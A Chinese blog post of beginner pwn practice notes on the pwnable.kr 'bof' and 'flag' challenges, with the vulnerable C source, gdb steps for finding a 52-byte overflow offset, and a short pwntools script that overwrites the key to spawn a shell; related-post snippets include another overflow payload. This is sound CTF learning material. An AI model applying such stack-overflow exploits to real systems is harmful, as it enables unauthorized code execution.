pwn 练习笔记 暑假的第一天

最新推荐文章于 2023-05-19 22:36:21 发布
最新推荐文章于 2023-05-19 22:36:21 发布
阅读量427 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/81027075
版权
pwnable  bof

源码如下

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;

}

看源码意思就是要比较key与0xcafebabe,然而在main中调用func时传入的参数是0xdeadbeef,目标就是覆盖0xdeadbeef为0xcafebabe,通过比较得到flag。gets使我们有可控输入,使用gdb查看0xdeadbeef与我们要输入的字符串之间的距离,然后覆盖。

使用checksec查看bof之后,发现

栈溢出保护,不可执行保护,地址随机保护,都有。一个菜鸡不知道怎么办,看了大佬的博客。然后发现没有任何一个地方提及,未解之谜从假期的第一天开始。

gdb打开调试,在main函数下断(b main)

然后run

在main函数停下,ni到 call func然后si进call

进到func函数之后,ni一直到call get,

然后x/40xw $esp,查看一下栈情况

我们输入的字符串从0xffffd21c开始。0xdeadbeef在0xffffd250之后,所以0xffffd250-0xffffd21c=52,我们需要覆盖52个字节

payload='a'*52 +p32(0xcafebabe)

脚本为下:

from pwn import *
sh = remote('pwnable.kr',9000)

key = 0xcafebabe
payload = 'A'*52 + p32(key)

sh.sendline(payload)

sh.interactive()

pwnable  flag

看见题的当时是蒙的,ida打开看发现有点诡异,看了别人的博客发现是upx压缩啦

upx -d flag -o flag1    解压之后,ida再打开看,看见flag这个变量,双击过去看,看到了给flag赋值,拿到flag

这个题的考点有点迷,

碎碎念
被期末考打断了之前的学习节奏,这让我很难受。所以今天练习点基础题找一下感觉,今日份的练习结束,开始复习(o(╥﹏╥)o)


SsMing.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 2541
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
PWN入门(5)32位程序与64位程序和构造ROP链
Ba1_Ma0的博客
09-12 1580
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2220
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 590
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
pwn 练习笔记 暑假的第三天 rand函数
SsMing的博客
07-15 900
pwnable  random
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2208
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
PWN:关于对Random函数的研究
m0_53932372的博客
03-01 658
random在CTF中经常出现,所以今天我想深度的研究这个函数。 srand()函数 原型:void srand(unsigned seed); 给rand()函数设置种子。 rand()函数 原型 在执行前,会先查看是否使用了srand()函数。 1.使用了srand(seed),就按照这个东西来产生随机数。 2.没有使用srand(seed),就默认使用了srand(1)来产生随机数。 time函数 原型:time_t time(time_t *timer) timer=NULL时得到当前日历时间(从1
【七日打卡】Pwn之栈溢出利用详解
阿道夫的博客
12-22 860
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
pwn的学习3 bof
飞花的世界
12-28 610
那我就首先下载代码。。。 #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(k...
xctf攻防世界pwn基础题解(新手食用)
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
pwn 攻防世界刷题记录
m0_75234353的博客
05-19 158
运行就能getshell直接nc。
pwn(2) 愚人发现了pwn的有趣之处 对于填充大小的研究
brightendavid的博客
05-09 259
#python3 from pwn import * p = remote('node3.buuoj.cn', '25822') payload = b'b' * (0x40+8)+ p64(0x40060D) p.sendline(payload) p.interactive() 抄了几个wp,一直很奇怪为什么这个填充的字符数量为什么规则不一样。 比如上面的填充规则是输入的字符大小+EBP大小 因为是64位的系统所以EBP大小是8,而前面的0x40是64位,也就是此处输入的字符大小。 后面
pwntools使用简介
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
buuctf pwn 第五空间决赛pwn5
最新发布
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值